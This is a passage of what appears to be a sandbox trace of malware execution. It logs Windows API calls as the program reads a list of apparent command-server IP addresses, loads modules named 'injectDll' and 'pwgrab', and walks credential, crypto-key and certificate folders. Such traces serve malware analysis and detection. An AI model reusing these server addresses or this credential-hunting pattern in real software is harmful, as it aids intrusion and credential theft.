[0262.492] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.492] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.492] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=28, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.492] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.492] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.492] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="198.46.198.241:443") returned 0x0 [0262.493] StrStrIW (lpFirst="198.46.198.241:443", lpSrch=":") returned=":443" [0262.493] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0 [0262.493] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.493] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=29, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.493] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.493] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.493] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="199.227.126.250:449") returned 0x0 [0262.493] StrStrIW (lpFirst="199.227.126.250:449", lpSrch=":") returned=":449" [0262.494] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.494] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.494] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=30, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.494] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.494] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.494] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="97.87.172.0:449") returned 0x0 [0262.494] StrStrIW (lpFirst="97.87.172.0:449", lpSrch=":") returned=":449" [0262.495] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.495] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.495] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=31, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.495] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.495] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.495] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="24.247.182.174:449") returned 0x0 [0262.495] StrStrIW (lpFirst="24.247.182.174:449", lpSrch=":") returned=":449" [0262.496] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.496] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.496] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=32, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.496] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.496] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.496] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="94.232.20.113:443") returned 0x0 [0262.496] StrStrIW (lpFirst="94.232.20.113:443", lpSrch=":") returned=":443" [0262.497] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0 [0262.497] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.497] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=33, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.497] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.497] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.497] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="190.145.74.84:449") returned 0x0 [0262.497] StrStrIW (lpFirst="190.145.74.84:449", lpSrch=":") returned=":449" [0262.498] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.498] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.498] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=34, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.498] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.498] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.498] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="47.49.168.50:443") returned 0x0 [0262.498] StrStrIW (lpFirst="47.49.168.50:443", lpSrch=":") returned=":443" [0262.499] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0 [0262.499] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.499] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=35, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.499] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.499] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.499] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="64.128.175.37:449") returned 0x0 [0262.499] StrStrIW (lpFirst="64.128.175.37:449", lpSrch=":") returned=":449" [0262.500] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.500] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.500] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=36, listItem=0x1ee300 | out: listItem=0x1ee300*=0x17abde0) returned 0x0 [0262.500] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee308 | out: nameString=0x1ee308*="srv") returned 0x0 [0262.500] lstrcmpiW (lpString1="srv", lpString2="srv") returned 0 [0262.500] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee310 | out: text=0x1ee310*="24.227.222.4:449") returned 0x0 [0262.500] StrStrIW (lpFirst="24.227.222.4:449", lpSrch=":") returned=":449" [0262.501] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0 [0262.501] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.501] IUnknown:Release (This=0x17a8aa0) returned 0x0 [0262.501] IXMLDOMNode:get_nextSibling (in: This=0x17abd70, nextSibling=0x1ee480 | out: nextSibling=0x1ee480*=0x17abde0) returned 0x0 [0262.501] IUnknown:Release (This=0x17abd70) returned 0x0 [0262.501] IXMLDOMNode:get_baseName (in: This=0x17abde0, nameString=0x1ee4d8 | out: nameString=0x1ee4d8*="autorun") returned 0x0 [0262.501] IXMLDOMNode:get_text (in: This=0x17abde0, text=0x1ee4e0 | out: text=0x1ee4e0*="") returned 0x0 [0262.501] IXMLDOMNode:hasChildNodes (in: This=0x17abde0, hasChild=0x1ee460 | out: hasChild=0x1ee460*=0xffff) returned 0x0 [0262.501] IXMLDOMNode:get_childNodes (in: This=0x17abde0, childList=0x1ee340 | out: childList=0x1ee340*=0x17a8aa0) returned 0x0 [0262.502] IXMLDOMNodeList:get_length (in: This=0x17a8aa0, listLength=0x1ee468 | out: listLength=0x1ee468*=3) returned 0x0 [0262.502] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=0, listItem=0x1ee470 | out: listItem=0x1ee470*=0x17abd70) returned 0x0 [0262.502] IXMLDOMNode:get_baseName (in: This=0x17abd70, nameString=0x1ee478 | out: nameString=0x1ee478*="module") returned 0x0 [0262.502] lstrcmpiW (lpString1="module", lpString2="module") returned 0 [0262.502] IXMLDOMNode:get_attributes (in: This=0x17abd70, attributeMap=0x1ee328 | out: attributeMap=0x1ee328*=0x17ac0b0) returned 0x0 [0262.502] IXMLDOMNamedNodeMap:get_length (in: This=0x17ac0b0, listLength=0x1ee318 | out: listLength=0x1ee318*=2) returned 0x0 [0262.502] IXMLDOMNamedNodeMap:reset (This=0x17ac0b0) returned 0x0 [0262.502] IXMLDOMNamedNodeMap:nextNode (in: This=0x17ac0b0, nextItem=0x1ee320 | out: nextItem=0x1ee320*=0x17ac150) returned 0x0 [0262.502] IXMLDOMNode:get_baseName (in: This=0x17ac150, nameString=0x31ddf0 | out: nameString=0x31ddf0*="name") returned 0x0 [0262.502] IXMLDOMNode:get_text (in: This=0x17ac150, text=0x31ddf8 | out: text=0x31ddf8*="systeminfo") returned 0x0 [0262.502] IUnknown:Release (This=0x17ac150) returned 0x0 [0262.502] IXMLDOMNamedNodeMap:nextNode (in: This=0x17ac0b0, nextItem=0x1ee320 | out: nextItem=0x1ee320*=0x17ac150) returned 0x0 [0262.503] IXMLDOMNode:get_baseName (in: This=0x17ac150, nameString=0x31de00 | out: nameString=0x31de00*="ctl") returned 0x0 [0262.503] IXMLDOMNode:get_text (in: This=0x17ac150, text=0x31de08 | out: text=0x31de08*="GetSystemInfo") returned 0x0 [0262.503] IUnknown:Release (This=0x17ac150) returned 0x0 [0262.503] IUnknown:Release (This=0x17ac0b0) returned 0x0 [0262.503] lstrcmpiW (lpString1="name", lpString2="name") returned 0 [0262.503] lstrcmpiW (lpString1="name", lpString2="ctl") returned 1 [0262.503] lstrcmpiW (lpString1="ctl", lpString2="ctl") returned 0 [0262.503] IUnknown:Release (This=0x17abd70) returned 0x0 [0262.503] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=1, listItem=0x1ee470 | out: listItem=0x1ee470*=0x17ac150) returned 0x0 [0262.503] IXMLDOMNode:get_baseName (in: This=0x17ac150, nameString=0x1ee478 | out: nameString=0x1ee478*="module") returned 0x0 [0262.503] lstrcmpiW (lpString1="module", lpString2="module") returned 0 [0262.503] IXMLDOMNode:get_attributes (in: This=0x17ac150, attributeMap=0x1ee328 | out: attributeMap=0x1ee328*=0x17ac0b0) returned 0x0 [0262.504] IXMLDOMNamedNodeMap:get_length (in: This=0x17ac0b0, listLength=0x1ee318 | out: listLength=0x1ee318*=1) returned 0x0 [0262.504] IXMLDOMNamedNodeMap:reset (This=0x17ac0b0) returned 0x0 [0262.504] IXMLDOMNamedNodeMap:nextNode (in: This=0x17ac0b0, nextItem=0x1ee320 | out: nextItem=0x1ee320*=0x17abd70) returned 0x0 [0262.504] IXMLDOMNode:get_baseName (in: This=0x17abd70, nameString=0x2c8120 | out: nameString=0x2c8120*="name") returned 0x0 [0262.504] IXMLDOMNode:get_text (in: This=0x17abd70, text=0x2c8128 | out: text=0x2c8128*="injectDll") returned 0x0 [0262.504] IUnknown:Release (This=0x17abd70) returned 0x0 [0262.504] IUnknown:Release (This=0x17ac0b0) returned 0x0 [0262.504] lstrcmpiW (lpString1="name", lpString2="name") returned 0 [0262.504] lstrcmpiW (lpString1="name", lpString2="ctl") returned 1 [0262.504] IUnknown:Release (This=0x17ac150) returned 0x0 [0262.504] IXMLDOMNodeList:get_item (in: This=0x17a8aa0, index=2, listItem=0x1ee470 | out: listItem=0x1ee470*=0x17abd70) returned 0x0 [0262.504] IXMLDOMNode:get_baseName (in: This=0x17abd70, nameString=0x1ee478 | out: nameString=0x1ee478*="module") returned 0x0 [0262.505] lstrcmpiW (lpString1="module", lpString2="module") returned 0 [0262.505] IXMLDOMNode:get_attributes (in: This=0x17abd70, attributeMap=0x1ee328 | out: attributeMap=0x1ee328*=0x17ac0b0) returned 0x0 [0262.505] IXMLDOMNamedNodeMap:get_length (in: This=0x17ac0b0, listLength=0x1ee318 | out: listLength=0x1ee318*=1) returned 0x0 [0262.505] IXMLDOMNamedNodeMap:reset (This=0x17ac0b0) returned 0x0 [0262.505] IXMLDOMNamedNodeMap:nextNode (in: This=0x17ac0b0, nextItem=0x1ee320 | out: nextItem=0x1ee320*=0x17ac150) returned 0x0 [0262.505] IXMLDOMNode:get_baseName (in: This=0x17ac150, nameString=0x2c8120 | out: nameString=0x2c8120*="name") returned 0x0 [0262.505] IXMLDOMNode:get_text (in: This=0x17ac150, text=0x2c8128 | out: text=0x2c8128*="pwgrab") returned 0x0 [0262.505] IUnknown:Release (This=0x17ac150) returned 0x0 [0262.505] IUnknown:Release (This=0x17ac0b0) returned 0x0 [0262.505] lstrcmpiW (lpString1="name", lpString2="name") returned 0 [0262.505] lstrcmpiW (lpString1="name", lpString2="ctl") returned 1 [0262.505] IUnknown:Release (This=0x17abd70) returned 0x0 [0262.505] IUnknown:Release (This=0x17a8aa0) returned 0x0 [0262.506] IXMLDOMNode:get_nextSibling (in: This=0x17abde0, nextSibling=0x1ee480 | out: nextSibling=0x1ee480*=0x0) returned 0x1 [0262.506] IUnknown:Release (This=0x17abde0) returned 0x0 [0262.506] DOMDocument30:IUnknown:Release (This=0x17abcf0) returned 0x1 [0262.506] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x1ee120 | out: pszPath="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x0 [0262.517] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\\\*", lpFindFileData=0x1ed650 | out: lpFindFileData=0x1ed650) returned 0x2d2390 [0262.517] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.517] FindNextFileW (in: hFindFile=0x2d2390, lpFindFileData=0x1ed650 | out: lpFindFileData=0x1ed650) returned 1 [0262.517] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.518] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.518] FindNextFileW (in: hFindFile=0x2d2390, lpFindFileData=0x1ed650 | out: lpFindFileData=0x1ed650) returned 1 [0262.518] lstrcmpiW (lpString1="Microsoft", lpString2=".") returned 1 [0262.518] lstrcmpiW (lpString1="Microsoft", lpString2="..") returned 1 [0262.518] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\\\Microsoft\\\\*", lpFindFileData=0x1ecbb0 | out: lpFindFileData=0x1ecbb0) returned 0x2d23f0 [0262.518] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.518] FindNextFileW (in: hFindFile=0x2d23f0, lpFindFileData=0x1ecbb0 | out: lpFindFileData=0x1ecbb0) returned 1 [0262.519] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.519] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.519] FindNextFileW (in: hFindFile=0x2d23f0, lpFindFileData=0x1ecbb0 | out: lpFindFileData=0x1ecbb0) returned 1 [0262.519] lstrcmpiW (lpString1="SystemCertificates", lpString2=".") returned 1 [0262.519] lstrcmpiW (lpString1="SystemCertificates", lpString2="..") returned 1 [0262.519] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\*", lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 0x2d2510 [0262.519] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.519] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.519] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.519] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.519] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.519] lstrcmpiW (lpString1="My", lpString2=".") returned 1 [0262.519] lstrcmpiW (lpString1="My", lpString2="..") returned 1 [0262.519] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\My\\\\*", lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0x2d2570 [0262.519] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.520] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.520] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.520] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.520] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.520] lstrcmpiW (lpString1="Certificates", lpString2=".") returned 1 [0262.520] lstrcmpiW (lpString1="Certificates", lpString2="..") returned 1 [0262.520] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\My\\\\Certificates\\\\*", lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 0x2d24b0 [0262.520] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.520] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 1 [0262.520] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.520] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.520] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 0 [0262.520] FindClose (in: hFindFile=0x2d24b0 | out: hFindFile=0x2d24b0) returned 1 [0262.521] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.521] lstrcmpiW (lpString1="CRLs", lpString2=".") returned 1 [0262.521] lstrcmpiW (lpString1="CRLs", lpString2="..") returned 1 [0262.521] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\My\\\\CRLs\\\\*", lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 0x2d24b0 [0262.521] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.521] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 1 [0262.521] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.521] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.521] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 0 [0262.521] FindClose (in: hFindFile=0x2d24b0 | out: hFindFile=0x2d24b0) returned 1 [0262.521] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.521] lstrcmpiW (lpString1="CTLs", lpString2=".") returned 1 [0262.521] lstrcmpiW (lpString1="CTLs", lpString2="..") returned 1 [0262.521] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\My\\\\CTLs\\\\*", lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 0x2d24b0 [0262.521] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.521] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 1 [0262.522] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.522] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.522] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 0 [0262.522] FindClose (in: hFindFile=0x2d24b0 | out: hFindFile=0x2d24b0) returned 1 [0262.522] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0 [0262.522] FindClose (in: hFindFile=0x2d2570 | out: hFindFile=0x2d2570) returned 1 [0262.522] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 0 [0262.522] FindClose (in: hFindFile=0x2d2510 | out: hFindFile=0x2d2510) returned 1 [0262.522] FindNextFileW (in: hFindFile=0x2d23f0, lpFindFileData=0x1ecbb0 | out: lpFindFileData=0x1ecbb0) returned 1 [0262.522] lstrcmpiW (lpString1="Windows", lpString2=".") returned 1 [0262.522] lstrcmpiW (lpString1="Windows", lpString2="..") returned 1 [0262.522] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\*", lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 0x2d2510 [0262.522] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.522] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.522] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.522] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.522] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.522] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.523] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 0 [0262.523] FindClose (in: hFindFile=0x2d2510 | out: hFindFile=0x2d2510) returned 1 [0262.523] FindNextFileW (in: hFindFile=0x2d23f0, lpFindFileData=0x1ecbb0 | out: lpFindFileData=0x1ecbb0) returned 0 [0262.523] FindClose (in: hFindFile=0x2d23f0 | out: hFindFile=0x2d23f0) returned 1 [0262.523] FindNextFileW (in: hFindFile=0x2d2390, lpFindFileData=0x1ed650 | out: lpFindFileData=0x1ed650) returned 0 [0262.523] FindClose (in: hFindFile=0x2d2390 | out: hFindFile=0x2d2390) returned 1 [0262.523] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0xffffffffffffffff, dwFlags=0x0, pszPath=0x1ee330 | out: pszPath="C:\\Users\\Default\\AppData\\Roaming") returned 0x0 [0262.551] lstrcmpiW (lpString1="C:\\Users\\Default\\AppData\\Roaming", lpString2="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned -1 [0262.551] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\*", lpFindFileData=0x1ed650 | out: lpFindFileData=0x1ed650) returned 0x2d2390 [0262.551] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.551] FindNextFileW (in: hFindFile=0x2d2390, lpFindFileData=0x1ed650 | out: lpFindFileData=0x1ed650) returned 1 [0262.552] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.552] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.552] FindNextFileW (in: hFindFile=0x2d2390, lpFindFileData=0x1ed650 | out: lpFindFileData=0x1ed650) returned 1 [0262.552] lstrcmpiW (lpString1="Identities", lpString2=".") returned 1 [0262.552] lstrcmpiW (lpString1="Identities", lpString2="..") returned 1 [0262.552] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Identities\\\\*", lpFindFileData=0x1ecbb0 | out: lpFindFileData=0x1ecbb0) returned 0x2d23f0 [0262.552] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.553] FindNextFileW (in: hFindFile=0x2d23f0, lpFindFileData=0x1ecbb0 | out: lpFindFileData=0x1ecbb0) returned 1 [0262.553] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.553] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.553] FindNextFileW (in: hFindFile=0x2d23f0, lpFindFileData=0x1ecbb0 | out: lpFindFileData=0x1ecbb0) returned 1 [0262.553] lstrcmpiW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2=".") returned 1 [0262.553] lstrcmpiW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="..") returned 1 [0262.553] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Identities\\\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\\\*", lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 0x2d2510 [0262.553] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.553] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.553] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.553] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.553] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 0 [0262.553] FindClose (in: hFindFile=0x2d2510 | out: hFindFile=0x2d2510) returned 1 [0262.553] FindNextFileW (in: hFindFile=0x2d23f0, lpFindFileData=0x1ecbb0 | out: lpFindFileData=0x1ecbb0) returned 0 [0262.553] FindClose (in: hFindFile=0x2d23f0 | out: hFindFile=0x2d23f0) returned 1 [0262.553] FindNextFileW (in: hFindFile=0x2d2390, lpFindFileData=0x1ed650 | out: lpFindFileData=0x1ed650) returned 1 [0262.553] lstrcmpiW (lpString1="Microsoft", lpString2=".") returned 1 [0262.553] lstrcmpiW (lpString1="Microsoft", lpString2="..") returned 1 [0262.554] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\*", lpFindFileData=0x1ecbb0 | out: lpFindFileData=0x1ecbb0) returned 0x2d23f0 [0262.562] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.562] FindNextFileW (in: hFindFile=0x2d23f0, lpFindFileData=0x1ecbb0 | out: lpFindFileData=0x1ecbb0) returned 1 [0262.562] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.562] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.563] FindNextFileW (in: hFindFile=0x2d23f0, lpFindFileData=0x1ecbb0 | out: lpFindFileData=0x1ecbb0) returned 1 [0262.563] lstrcmpiW (lpString1="Credentials", lpString2=".") returned 1 [0262.563] lstrcmpiW (lpString1="Credentials", lpString2="..") returned 1 [0262.565] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Credentials\\\\*", lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 0x2d2510 [0262.566] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.566] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.566] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.566] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.566] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 0 [0262.566] FindClose (in: hFindFile=0x2d2510 | out: hFindFile=0x2d2510) returned 1 [0262.567] FindNextFileW (in: hFindFile=0x2d23f0, lpFindFileData=0x1ecbb0 | out: lpFindFileData=0x1ecbb0) returned 1 [0262.567] lstrcmpiW (lpString1="Crypto", lpString2=".") returned 1 [0262.567] lstrcmpiW (lpString1="Crypto", lpString2="..") returned 1 [0262.567] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Crypto\\\\*", lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 0x2d2510 [0262.567] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.568] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.568] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.568] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.568] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.568] lstrcmpiW (lpString1="RSA", lpString2=".") returned 1 [0262.568] lstrcmpiW (lpString1="RSA", lpString2="..") returned 1 [0262.568] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Crypto\\\\RSA\\\\*", lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0x2d2570 [0262.568] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.568] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.568] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.568] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.568] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0 [0262.568] FindClose (in: hFindFile=0x2d2570 | out: hFindFile=0x2d2570) returned 1 [0262.568] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 0 [0262.568] FindClose (in: hFindFile=0x2d2510 | out: hFindFile=0x2d2510) returned 1 [0262.568] FindNextFileW (in: hFindFile=0x2d23f0, lpFindFileData=0x1ecbb0 | out: lpFindFileData=0x1ecbb0) returned 1 [0262.568] lstrcmpiW (lpString1="Internet Explorer", lpString2=".") returned 1 [0262.569] lstrcmpiW (lpString1="Internet Explorer", lpString2="..") returned 1 [0262.569] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Internet 